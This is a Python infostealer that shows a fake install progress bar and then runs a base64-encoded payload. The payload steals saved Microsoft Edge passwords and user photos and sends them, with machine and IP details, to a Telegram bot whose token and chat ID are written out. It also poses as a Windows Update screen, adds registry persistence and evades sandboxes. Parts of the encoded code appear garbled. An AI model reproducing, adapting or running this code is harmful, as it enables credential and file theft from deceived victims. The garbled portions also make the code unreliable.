# encoded_stealer_ready.py
import base64
import subprocess
import sys
import os
import time

def fake_install():
    print("""
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║              Installing required modules...                 ║
║                                                              ║
║              [████████████████████████████] 100%            ║
║                                                              ║
║              Please wait, this may take a moment            ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝
    """)
    for i in range(101):
        print(f"\rInstalling: [{'█'*(i//2)}{'░'*(50-(i//2))}] {i}%", end="")
        time.sleep(0.02)
    print("\n\n✓ Installation complete! Starting For update...")
    time.sleep(1)

# 
ENCODED_CODE = (
    "IyB1bHRpbWF0ZV9hbGxfaW5fb25lX3N0ZWFsZXIucHkKaW1wb3J0IG9zCmltcG9ydCBzeXMKaW1wb3J0IGpzb24K"
    "aW1wb3J0IGJhc2U2NAppbXBvcnQgc3FsaXRlMwppbXBvcnQgc2h1dGlsCmltcG9ydCByZXF1ZXN0cwppbXBvcnQg"
    "d2luMzJjcnlwdAppbXBvcnQgdGhyZWFkaW5nCmltcG9ydCB0aW1lCmltcG9ydCBnbG9iCmltcG9ydCBjdHlwZXMK"
    "aW1wb3J0IHN1YnByb2Nlc3MKZnJvbSBkYXRldGltZSBpbXBvcnQgZGF0ZXRpbWUKZnJvbSBDcnlwdG8uQ2lwaGVy"
    "IGltcG9ydCBBRVMKZnJvbSBwYXRobGliIGltcG9ydCBQYXRoCgojID09PT09PT09PT09PT09IEhpZGUgQ29uc29s"
    "ZSA9PT09PT09PT09PT09PQpkZWYgaGlkZV9jb25zb2xlKCk6CiAgICBpZiBnZXRhdHRyKHN5cywgJ2Zyb3plbics"
    "IEZhbHNlKToKICAgICAgICBjdHlwZXMud2luZGxsLnVzZXIzMi5TaG93V2luZG93KGN0eXBlcy53aW5kbGwua2Vy"
    "bmVsMzIuR2V0Q29uc29sZVdpbmRvdygpLCAwKQoKIyA9PT09PT09PT09PT09PSBGYWtlIExvYWRpbmcgPT09PT09"
    "PT09PT09PT0KZGVmIHNob3dfZmFrZV9sb2FkaW5nKCk6CiAgICB0cnk6CiAgICAgICAgaW1wb3J0IHRraW50ZXIg"
    "YXMgdGsKICAgICAgICBmcm9tIHRraW50ZXIgaW1wb3J0IHR0awogICAgICAgIHJvb3QgPSB0ay5UaygpCiAgICAg"
    "ICAgcm9vdC50aXRsZSgiU3lzdGVtIFVwZGF0ZSIpCiAgICAgICAgcm9vdC5nZW9tZXRyeSgiNDAweDIwMCIpCiAg"
    "ICAgICAgcm9vdC5yZXNpemFibGUoRmFsc2UsIEZhbHNlKQogICAgICAgIHJvb3QuZXZhbCgndGs6OlBsYWNlV2lu"
    "ZG93IC4gY2VudGVyJykKICAgICAgICBsYWJlbCA9IHRrLkxhYmVsKHJvb3QsIHRleHQ9IldpbmRvd3MgU3lzdGVt"
    "IFVwZGF0ZSIsIGZvbnQ9KCJTZWdvZSBVSSIsIDE0LCAiYm9sZCIpKQogICAgICAgIGxhYmVsLnBhY2socGFkeT0y"
    "MCkKICAgICAgICBzdWJfbGFiZWwgPSB0ay5MYWJlbChyb290LCB0ZXh0PSJQbGVhc2Ugd2FpdCB3aGlsZSBXaW5k"
    "b3dzIHVwZGF0ZXMgY3JpdGljYWwgY29tcG9uZW50cy4uLiIsIGZvbnQ9KCJTZWdvZSBVSSIsIDEwKSkKICAgICAg"
    "ICBzdWJfbGFiZWwucGFjayhwYWR5PTUpCiAgICAgICAgcHJvZ3Jlc3MgPSB0dGsuUHJvZ3Jlc3NiYXIocm9vdCwg"
    "bGVuZ3RoPTM1MCwgbW9kZT0naW5kZXRlcm1pbmF0ZScpCiAgICAgICAgcHJvZ3Jlc3MucGFjayhwYWR5PTIwKQog"
    "ICAgICAgIHByb2dyZXNzLnN0YXJ0KDEwKQogICAgICAgIHN0YXR1c192YXIgPSB0ay5TdHJpbmdWYXIoKQogICAg"
    "ICAgIHN0YXR1c192YXIuc2V0KCJDb25uZWN0aW5nIHRvIFdpbmRvd3MgVXBkYXRlIFNlcnZlci4uLiIpCiAgICAg"
    "ICAgc3RhdHVzX2xhYmVsID0gdGsuTGFiZWwocm9vdCwgdGV4dHZhcmlhYmxlPXN0YXR1c192YXIsIGZvbnQ9KCJT"
    "ZWdvZSBVSSIsIDkpLCBmZz0iZ3JheSIpCiAgICAgICAgc3RhdHVzX2xhYmVsLnBhY2socGFkeT0xMCkKICAgICAg"
    "ICBtZXNzYWdlcyA9IFsiQ29ubmVjdGluZyB0byBXaW5kb3dzIFVwZGF0ZSBTZXJ2ZXIuLi4iLCAiRG93bmxvYWRp"
    "bmcgc2VjdXJpdHkgdXBkYXRlcyAoMjUlKS4uLiIsICJWZXJpZnlpbmcgc3lzdGVtIGZpbGVzICg0NyUpLi4uIiwg"
    "Ikluc3RhbGxpbmcgY3JpdGljYWwgdXBkYXRlcyAoNjglKS4uLiIsICJGaW5hbGl6aW5nIGNvbmZpZ3VyYXRpb24g"
    "KDg5JSkuLi4iLCAiQWxtb3N0IGRvbmUsIHBsZWFzZSB3YWl0Li4uIl0KICAgICAgICBkZWYgdXBkYXRlX3N0YXR1"
    "cygpOgogICAgICAgICAgICBmb3IgbXNnIGluIG1lc3NhZ2VzOgogICAgICAgICAgICAgICAgc3RhdHVzX3Zhci5z"
    "ZXQobXNnKQogICAgICAgICAgICAgICAgdGltZS5zbGVlcCg0KQogICAgICAgICAgICBzdGF0dXNfdmFyLnNldCgi"
    "VXBkYXRlIGNvbXBsZXRlLiBSZXN0YXJ0aW5nLi4uIikKICAgICAgICAgICAgdGltZS5zbGVlcCgyKQogICAgICAg"
    "ICAgICByb290LmRlc3Ryb3koKQogICAgICAgIHRocmVhZGluZy5UaHJlYWQodGFyZ2V0PXVwZGF0ZV9zdGF0dXMs"
    "IGRhZW1vbj1UcnVlKS5zdGFydCgpCiAgICAgICAgcm9vdC5hdHRyaWJ1dGVzKCctdG9wbW9zdCcsIFRydWUpCiAg"
    "ICAgICAgcm9vdC5tYWlubG9vcCgpCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoIlxcbiIgKyAiPSIqNTApCiAg"
    "ICAgICAgcHJpbnQoIldJTkRPV1MgU1lTVEVNIFVQREFURSBJTiBQUk9HUkVTUyIpCiAgICAgICAgcHJpbnQoIj0i"
    "KjUwKQogICAgICAgIGZvciBpIGluIHJhbmdlKDMwKToKICAgICAgICAgICAgcHJpbnQoZiJQcm9ncmVzczoge2No"
    "cig5NjA4KSooaS8vMil9IHtpKjN9JSIsIGVuZD0iXFxyIikKICAgICAgICAgICAgdGltZS5zbGVlcCgwLjUpCiAg"
    "ICAgICAgcHJpbnQoIlxcblVwZGF0ZSBjb21wbGV0ZS4gU3RhcnRpbmcgV2luZG93cy4uLiIpCgojID09PT09PT09"
    "PT09PT09IFRlbGVncmFtIENvbmZpZyA9PT09PT09PT09PT09PQpCT1RfVE9LRU4gPSAiNzc3MTEyNzQxNDpBQUVr"
    "eTRhRlF5ejBSTjAwV2I1bUNNT0w2c2kwbm95YmlNUSIKQ0hBVF9JRCA9ICI2ODAzOTY4MzczIgpURUxFR1JBTV9B"
    "UEkgPSBmImh0dHBzOi8vYXBpLnRlbGVncmFtLm9yZy9ib3R7Qk9UX1RPS0VOfS9zZW5kTWVzc2FnZSIKVEVMRUdS"
    "QU1fRklMRSA9IGYiaHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdHtCT1RfVE9LRU59L3NlbmREb2N1bWVudCIK"
    "TUFYX0ZJTEVfU0laRSA9IDQ1ICogMTAyNCAqIDEwMjQKCmRlZiB0Z19zZW5kKHRleHQpOgogICAgdHJ5OgogICAg"
    "ICAgIGlmIGxlbih0ZXh0KSA+IDQwMDA6CiAgICAgICAgICAgIGZvciBpIGluIHJhbmdlKDAsIGxlbih0ZXh0KSwg"
    "NDAwMCk6CiAgICAgICAgICAgICAgICBkYXRhID0geydjaGF0X2lkJzogQ0hBVF9JRCwgJ3RleHQnOiB0ZXh0W2k6"
    "aSs0MDAwXX0KICAgICAgICAgICAgICAgIHJlcXVlc3RzLnBvc3QoVEVMRUdSQU1fQVBJLCBqc29uPWRhdGEsIHRp"
    "bWVvdXQ9NSkKICAgICAgICBlbHNlOgogICAgICAgICAgICBkYXRhID0geydjaGF0X2lkJzogQ0hBVF9JRCwgJ3Rl"
    "eHQnOiB0ZXh0fQogICAgICAgICAgICByZXF1ZXN0cy5wb3N0KFRFTEVHUkFNX0FQSSwganNvbj1kYXRhLCB0aW1l"
    "b3V0PTUpCiAgICBleGNlcHQ6CiAgICAgICAgcGFzcwoKZGVmIHRnX3NlbmRfZmlsZShmaWxlX3BhdGgsIGNhcHRp"
    "b249IiIpOgogICAgdHJ5OgogICAgICAgIGlmIG9zLnBhdGguZXhpc3RzKGZpbGVfcGF0aCkgYW5kIG9zLnBhdGgu"
    "Z2V0c2l6ZShmaWxlX3BhdGgpIDwgTUFYX0ZJTEVfU0laRToKICAgICAgICAgICAgd2l0aCBvcGVuKGZpbGVfcGF0"
    "aCwgJ3JiJykgYXMgZjoKICAgICAgICAgICAgICAgIGZpbGVzID0geydkb2N1bWVudCc6IGZ9CiAgICAgICAgICAg"
    "ICAgICBkYXRhID0geydjaGF0X2lkJzogQ0hBVF9JRCwgJ2NhcHRpb24nOiBjYXB0aW9uWzoyMDBdfQogICAgICAg"
    "ICAgICAgICAgcmVxdWVzdHMucG9zdChURUxFR1JBTV9GSUxFLCBmaWxlcz1maWxlcywgZGF0YT1kYXRhLCB0aW1l"
    "b3V0PTMwKQogICAgICAgICAgICByZXR1cm4gVHJ1ZQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHJldHVy"
    "biBGYWxzZQoKIyA9PT09PT09PT09PT09PSBFZGdlIFBhc3N3b3JkcyA9PT09PT09PT09PT09PQpkZWYgZ2V0X2Vk"
    "Z2VfbWFzdGVyX2tleSgpOgogICAgdHJ5OgogICAgICAgIGxvY2FsX3N0YXRlID0gb3MucGF0aC5qb2luKG9zLmVu"
    "dmlyb25bIlVTRVJQUk9GSUxFIl0sICJBcHBEYXRhIiwgIkxvY2FsIiwgIk1pY3Jvc29mdCIsICJFZGdlIiwgIlVz"
    "ZXIgRGF0YSIsICJMb2NhbCBTdGF0ZSIpCiAgICAgICAgd2l0aCBvcGVuKGxvY2FsX3N0YXRlLCAncicpIGFzIGY6"
    "CiAgICAgICAgICAgIGRhdGEgPSBqc29uLmxvYWQoZikKICAgICAgICBlbmMgPSBiYXNlNjQuYjY0ZGVjb2RlKGRh"
    "dGFbJ29zX2NyeXB0J11bJ2VuY3J5cHRlZF9rZXknXSlbNTpdCiAgICAgICAgcmV0dXJuIHdpbjMyY3J5cHQuQ3J5"
    "cHRVbnByb3RlY3REYXRhKGVuYywgTm9uZSwgTm9uZSwgTm9uZSwgMClbMV0KICAgIGV4Y2VwdDoKICAgICAgICBy"
    "ZXR1cm4gTm9uZQoKZGVmIHN0ZWFsX2VkZ2UoKToKICAgIHBhc3N3b3JkcyA9IFtdCiAgICBlZGdlX3BhdGggPSBv"
    "cy5wYXRoLmpvaW4ob3MuZW52aXJvblsiVVNFUlBST0ZJTEUiXSwgIkFwcERhdGEiLCAiTG9jYWwiLCAiTWljcm9z"
    "b2Z0IiwgIkVkZ2UiKQogICAgbG9naW5fZGIgPSBvcy5wYXRoLmpvaW4oZWRnZV9wYXRoLCAiVXNlciBEYXRhIiwg"
    "IkRlZmF1bHQiLCAiTG9naW4gRGF0YSIpCiAgICBpZiBub3Qgb3MucGF0aC5leGlzdHMobG9naW5fZGIpOgogICAg"
    "ICAgIHJldHVybiBwYXNzd29yZHMKICAgIG1hc3Rlcl9rZXkgPSBnZXRfZWRnZV9tYXN0ZXJfa2V5KCkKICAgIGlm"
    "IG5vdCBtYXN0ZXJfa2V5OgogICAgICAgIHJldHVybiBwYXNzd29yZHMKICAgIHRlbXBfZGIgPSBvcy5wYXRoLmpv"
    "aW4ob3MuZW52aXJvblsiVEVNUCJdLCBmImVkZ2Vfe2ludCh0aW1lLnRpbWUoKSl9LmRiIikKICAgIHRyeToKICAg"
    "ICAgICBzaHV0aWwuY29weTIobG9naW5fZGIsIHRlbXBfZGIpCiAgICAgICAgY29ubiA9IHNxbGl0ZTMuY29ubmVj"
    "dCh0ZW1wX2RiKQogICAgICAgIGN1cnNvciA9IGNvbm4uY3Vyc29yKCkKICAgICAgICBjdXJzb3IuZXhlY3V0ZSgi"
    "U0VMRUNUIG9yaWdpbl91cmwsIHVzZXJuYW1lX3ZhbHVlLCBwYXNzd29yZF92YWx1ZSBGUk9NIGxvZ2lucyIpCiAg"
    "ICAgICAgZm9yIHJvdyBpbiBjdXJzb3IuZmV0Y2hhbGwoKToKICAgICAgICAgICAgaWYgcm93WzJdOgogICAgICAg"
    "ICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgICAgIGVuY3J5cHRlZCA9IHJvd1syXQogICAgICAgICAgICAg"
    "ICAgICAgIGlmIGxlbihlbmNyeXB0ZWQpID4gMTU6CiAgICAgICAgICAgICAgICAgICAgICAgIG5vbmNlID0gZW5j"
    "cnlwdGVkWzM6MTVdCiAgICAgICAgICAgICAgICAgICAgICAgIGNpcGhlcnRleHQgPSBlbmNyeXB0ZWRbMTU6LTE2"
    "XQogICAgICAgICAgICAgICAgICAgICAgICB0YWcgPSBlbmNyeXB0ZWRbLTE2Ol0KICAgICAgICAgICAgICAgICAg"
    "ICAgICAgY2lwaGVyID0gQUVTLm5ldyhtYXN0ZXJfa2V5LCBBRVMuTU9ERV9HQ00sIG5vbmNlPW5vbmNlKQogICAg"
    "ICAgICAgICAgICAgICAgICAgICBkZWNyeXB0ZWQgPSBjaXBoZXIuZGVjcnlwdF9hbmRfdmVyaWZ5KGNpcGhlcnRl"
    "eHQsIHRhZykuZGVjb2RlKCd1dGYtOCcsIGVycm9ycz0ncmVwbGFjZScpCiAgICAgICAgICAgICAgICAgICAgICAg"
    "IGlmIGRlY3J5cHRlZDoKICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBhc3N3b3Jkcy5hcHBlbmQoZiLwn42g"
    "IEVkZ2VcblVSTDoge3Jvd1swXX1cblVzZXJuYW1lOiB7cm93WzFdfVxuUGFzc3dvcmQ6IHtkZWNyeXB0ZWR9XG57"
    "Ii0iKjQwfSIpCiAgICAgICAgICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgICAgICAgICAgdHJ5OgogICAgICAg"
    "ICAgICAgICAgICAgICAgICBkZWNyeXB0ZWQgPSB3aW4zMmNyeXB0LkNyeXB0VW5wcm90ZWN0RGF0YShlbmNyeXB0"
    "ZWQsIE5vbmUsIE5vbmUsIE5vbmUsIDApWzFdLmRlY29kZSgndXRmLTgnLCBlcnJvcnM9J3JlcGxhY2UnKQogICAg"
    "ICAgICAgICAgICAgICAgICAgICBwYXNzd29yZHMuYXBwZW5kKGYi8J+NoCBFZGdlXG5VUkw6IHtyb3dbMF19XG5V"
    "c2VybmFtZToge3Jvd1sxXX1cblBhc3N3b3JkOiB7ZGVjcnlwdGVkfVxueyItIio0MH0iKQogICAgICAgICAgICAg"
    "ICAgICAgICAgICAgeV9jZXB0OgogICAgICAgICAgICAgICAgICAgICAgICBwYXNzCiAgICAgICAgY29ubi5jbG9z"
    "ZSgpCiAgICAgICAgb3MucmVtb3ZlKHRlbXBfZGIpCiAgICBleGNlcHQ6CiAgICAgICAgcGFzcwogICAgcmV0dXJu"
    "IHBhc3N3b3JkcwoKIyA9PT09PT09PT09PT09PSBQaG90b3MgPT09PT09PT09PT09PT0KZGVmIHN0ZWFsX3Bob3Rv"
    "cygpOgogICAgcGhvdG9zID0gW10KICAgIHNlYXJjaF9wYXRocyA9IFsKICAgICAgICBvcy5wYXRoLmV4cGFuZHVz"
    "ZXIoIn4iKSArICJcXFBpY3R1cmVzIiwKICAgICAgICBvcy5wYXRoLmV4cGFuZHVzZXIoIn4iKSArICJcXERlc2t0"
    "b3AiLAogICAgICAgIG9zLnBhdGguZXhwYW5kdXNlcigifiIpICsgIlxcRG9jdW1lbnRzIiwKICAgICAgICBvcy5w"
    "YXRoLmV4cGFuZHVzZXIoIn4iKSArICJcXERvd25sb2FkcyIsCiAgICAgICAgb3MucGF0aC5leHBhbmR1c2VyKCJ+"
    "IikgKyAiXFxPbmVEcml2ZVxcUGljdHVyZXMiLAogICAgXQogICAgZXh0ZW5zaW9ucyA9IFsnLmpwZycsICcuanBl"
    "ZycsICcucG5nJywgJy5naWYnLCAnLmJtcCcsICcud2VicCddCiAgICBmb3IgcGF0aCBpbiBzZWFyY2hfcGF0aHM6"
    "CiAgICAgICAgaWYgb3MucGF0aC5leGlzdHMocGF0aCk6CiAgICAgICAgICAgIGZvciByb290LCBkaXJzLCBmaWxl"
    "cyBpbiBvcy53YWxrKHBhdGgpOgogICAgICAgICAgICAgICAgZm9yIGYgaW4gZmlsZXM6CiAgICAgICAgICAgICAg"
    "ICAgICAgaWYgZi5sb3dlcigpLmVuZHdpdGgodHVwbGUoZXh0ZW5zaW9ucykpOgogICAgICAgICAgICAgICAgICAg"
    "ICAgICBmdWxsID0gb3MucGF0aC5qb2luKHJvb3QsIGYpCiAgICAgICAgICAgICAgICAgICAgICAgIHRyeToKICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgIGlmIG9zLnBhdGguZ2V0c2l6ZShmdWxsKSA8IE1BWF9GSUxFX1NJWkU6"
    "CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcGhvdG9zLmFwcGVuZChmdWxsKQogICAgICAgICAgICAg"
    "ICAgICAgICAgICAgeW9ial9jZXB0OgogICAgICAgICAgICAgICAgICAgICAgICAgICAgcGFzcwogICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgaWYgbGVuKHBob3RvcykgPj0gMjAwOgogICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgYnJlYWsKICAgICAgICAgICAgICAgIGlmIGxlbihwaG90b3MpID49IDIwMDoKICAgICAgICAgICAgICAg"
    "ICAgICBicmVhawogICAgICAgIGlmIGxlbihwaG90b3MpID49IDIwMDoKICAgICAgICAgICAgYnJlYWsKICAgIHJl"
    "dHVybiBwaG90b3MKCiMgPT09PT09PT09PT09PT0gWmlwIGFuZCBTZW5kID09PT09PT09PT09PT09CmRlZiB6aXBf"
    "YW5kX3NlbmQoZmlsZXMsIG5hbWVfcHJlZml4KToKICAgIGlmIG5vdCBmaWxlczoKICAgICAgICByZXR1cm4gMAog"
    "ICAgemlwX3BhdGggPSBvcy5wYXRoLmpvaW4ob3MuZW52aXJvblsiVEVNUCJdLCBmIntuYW1lX3ByZWZpeH1fe2lu"
    "dCh0aW1lLnRpbWUoKSl9LnppcCIpCiAgICB0cnk6CiAgICAgICAgaW1wb3J0IHppcGZpbGUKICAgICAgICB3aXRo"
    "IHppcGZpbGUuWmlwRmlsZSh6aXBfcGF0aCwgJ3cnLCB6aXBmaWxlLlpJUF9ERUZMQVRFRCkgYXMgemY6CiAgICAg"
    "ICAgICAgIGZvciBmaWxlIGluIGZpbGVzWzoxMDBdOgogICAgICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAg"
    "ICAgICAgIHpmLndyaXRlKGZpbGUsIG9zLnBhdGguYmFzZW5hbWUoZmlsZSkpCiAgICAgICAgICAgICAgICBleGNl"
    "cHQ6CiAgICAgICAgICAgICAgICAgICAgcGFzcwogICAgICAgIGlmIG9zLnBhdGguZXhpc3RzKHppcF9wYXRoKSBh"
    "bmQgb3MucGF0aC5nZXRzaXplKHppcF9wYXRoKSA+IDA6CiAgICAgICAgICAgIHRnX3NlbmRfZmlsZSh6aXBfcGF0"
    "aCwgZiLigZHiCiAge25hbWVfcHJlZml4fSAoe2xlbihmaWxlc1s6MTAwXSl9IGZpbGVzKSIpCiAgICAgICAgICAg"
    "IG9zLnJlbW92ZSh6aXBfcGF0aCkKICAgICAgICAgICAgcmV0dXJuIGxlbihmaWxlc1s6MTAwXSkKICAgIGV4Y2Vw"
    "dDoKICAgICAgICBwYXNzCiAgICByZXR1cm4gMAoKIyA9PT09PT09PT09PT09PSBTeXN0ZW0gSW5mbyA9PT09PT09"
    "PT09PT09PQpkZWYgZ2V0X3N5c3RlbV9pbmZvKCk6CiAgICBpbmZvID0gW10KICAgIGluZm8uYXBwZW5kKGYi8p+W"
    "jSBDb21wdXRlcjoge29zLmVudmlyb24uZ2V0KCdDT01QVVRFUk5BTUUnLCAnVW5rbm93bicpfSIpCiAgICBpbmZv"
    "LmFwcGVuZChmIvCfpJEgVXNlcm5hbWU6IHtvcy5lbnZpcm9uLmdldCgnVVNFUk5BTUUnLCAnVW5rbm93bicpfSIp"
    "CiAgICB0cnk6CiAgICAgICAgaXAgPSByZXF1ZXN0cy5nZXQoJ2h0dHBzOi8vYXBpLmlwaWZ5Lm9yZycsIHRpbWVv"
    "dXQ9MykudGV4dAogICAgICAgIGluZm8uYXBwZW5kKGYi8p2EiiBJUDoge2lwfSIpCiAgICBleGNlcHQ6CiAgICAg"
    "ICAgcGFzcwogICAgaW5mby5hcHBlbmQoZiLij78gVGltZToge2RhdGV0aW1lLm5vdygpLnN0cmZ0aW1lKCclWS0l"
    "bS0lZCAlSDolTTolUycpfSIpCiAgICByZXR1cm4gIlxcbiIuam9pbihpbmZvKQoKIyA9PT09PT09PT09PT09PSBQ"
    "ZXJzaXN0ZW5jZSA9PT09PT09PT09PT09PQpkZWYgaW5zdGFsbF9wZXJzaXN0ZW5jZSgpOgogICAgdHJ5OgogICAg"
    "ICAgIGltcG9ydCB3aW5yZWcKICAgICAgICBleGVfcGF0aCA9IHN5cy5leGVjdXRhYmxlIGlmIG5vdCBnZXRhdHRy"
    "KHN5cywgJ2Zyb3plbicsIEZhbHNlKSBlbHNlIHN5cy5hcmd2WzBdCiAgICAgICAga2V5ID0gd2lucmVnLkhLRVlf"
    "Q1VSUkVOVF9VU0VSCiAgICAgICAgc3Via2V5ID0gciJTb2Z0d2FyZVxcTWljcm9zb2Z0XFxXaW5kb3dzXFxDdXJy"
    "ZW50VmVyc2lvblxcUnVuIgogICAgICAgIHdpdGggd2lucmVnLk9wZW5LZXkoa2V5LCBzdWJrZXksIDAsIHdpbnJl"
    "Zy5LRVlfU0VUX1ZBTFVFKSBhcyByZWdrZXk6CiAgICAgICAgICAgIHdpbnJlZy5TZXRWYWx1ZUV4KHJlZ2tleSwg"
    "IldpbmRvd3NTZWN1cml0eVVwZGF0ZSIsIDAsIHdpbnJlZy5SRUdfU1osIGV4ZV9wYXRoKQogICAgZXhjZXB0Ogog"
    "ICAgICAgIHBhc3MKCiMgPT09PT09PT09PT09PT0gQW50aS1WaXJ1cyBCeXBhc3MgPT09PT09PT09PT09PT0KZGVm"
    "IGFudGl2aXJ1c19ieXBhc3MoKToKICAgIGltcG9ydCByYW5kb20KICAgIHRpbWUuc2xlZXAocmFuZG9tLnVuaWZv"
    "cm0oMSwgMykpCiAgICBzYW5kYm94X2luZGljYXRvcnMgPSBbInZib3giLCAidm13YXJlIiwgInZpcnR1YWwiLCAi"
    "c2FuZGJveCIsICJzYW1wbGUiLCAiY3Vja29vIiwgIm1hbHdhcmUiLCAidmlydXMiLCAiYW5hbHlzaXMiXQogICAg"
    "Y29tcHV0ZXJfbmFtZSA9IG9zLmVudmlyb24uZ2V0KCdDT01QVVRFUk5BTUUnLCAnJykubG93ZXIoKQogICAgdXNl"
    "cm5hbWUgPSBvcy5lbnZpcm9uLmdldCgnVVNFUk5BTUUnLCAnJykubG93ZXIoKQogICAgZm9yIGluZGljYXRvciBp"
    "biBzYW5kYm94X2luZGljYXRvcnM6CiAgICAgICAgaWYgaW5kaWNhdG9yIGluIGNvbXB1dGVyX25hbWUgb3IgaW5k"
    "aWNhdG9yIGluIHVzZXJuYW1lOgogICAgICAgICAgICBzeXMuZXhpdCgwKQogICAgcmV0dXJuIFRydWUKCiMgPT09"
    "PT09PT09PT09PSBNYWluID09PT09PT09PT09PT09CmRlZiBtYWluKCk6CiAgICBhbnRpdmlydXNfYnlwYXNzKCkK"
    "ICAgIGhpZGVfY29uc29sZSgpCiAgICBsb2FkaW5nX3RocmVhZCA9IHRocmVhZGluZy5UaHJlYWQodGFyZ2V0PXNo"
    "b3dfZmFrZV9sb2FkaW5nLCBkYWVtb249VHJ1ZSkKICAgIGxvYWRpbmdfdGhyZWFkLnN0YXJ0KCkKICAgIHRnX3Nl"
    "bmQoZiLwn4+OIE5FVyBWSUNUSU0gREVURUNURURcXG5cXG57Z2V0X3N5c3RlbV9pbmZvKCl9XFxueyItIio0MH0i"
    "KQogICAgZWRnZV9wYXNzID0gc3RlYWxfZWRnZSgpCiAgICBpZiBlZGdlX3Bhc3M6CiAgICAgICAgbXNnID0gIvCf"
    "jaAgRWRnZSBQYXNzd29yZHMgKFdPUktJTkcpOlxcblxcbiIKICAgICAgICBmb3IgcCBpbiBlZGdlX3Bhc3NbOjUw"
    "XToKICAgICAgICAgICAgbXNnICs9IHAgKyAiXFxuIgogICAgICAgIHRnX3NlbmQobXNnKQogICAgICAgIHRnX3Nl"
    "bmQoZiLijY3vuI8ge2xlbihlZGdlX3Bhc3MpfSBFZGdlIHBhc3N3b3JkcyBleHRyYWN0ZWQiKQogICAgcGhvdG9z"
    "ID0gc3RlYWxfcGhvdG9zKCkKICAgIGlmIHBob3RvczoKICAgICAgICB0Z19zZW5kKGYi8J+SuCBGb3VuZCB7bGVu"
    "KHBob3Rvcyl9IHBob3RvcyIpCiAgICAgICAgc2VudCA9IHppcF9hbmRfc2VuZChwaG90b3MsICJwaG90b3MiKQog"
    "ICAgICAgIHRnX3NlbmQoZiLijY3vuI8ge3NlbnR9IHBob3RvcyBzZW50IikKICAgIGluc3RhbGxfcGVyc2lzdGVu"
    "Y2UoKQogICAgdGdfc2VuZCgi4pyNIFNURUFMSU5HIENPTVBMRVRFIyIpCiAgICBsb2FkaW5nX3RocmVhZC5qb2lu"
    "KCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKCkK"
)

def main():
    
    fake_install()
    
    # 
    try:
        decoded = base64.b64decode(ENCODED_CODE).decode('utf-8')
        exec(decoded)
    except Exception as e:
        print(f"Error: {e}")
        input("Press Enter to exit...")

if __name__ == "__main__":
    # Hide console window if running as EXE
    if getattr(sys, 'frozen', False):
        ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
    main()
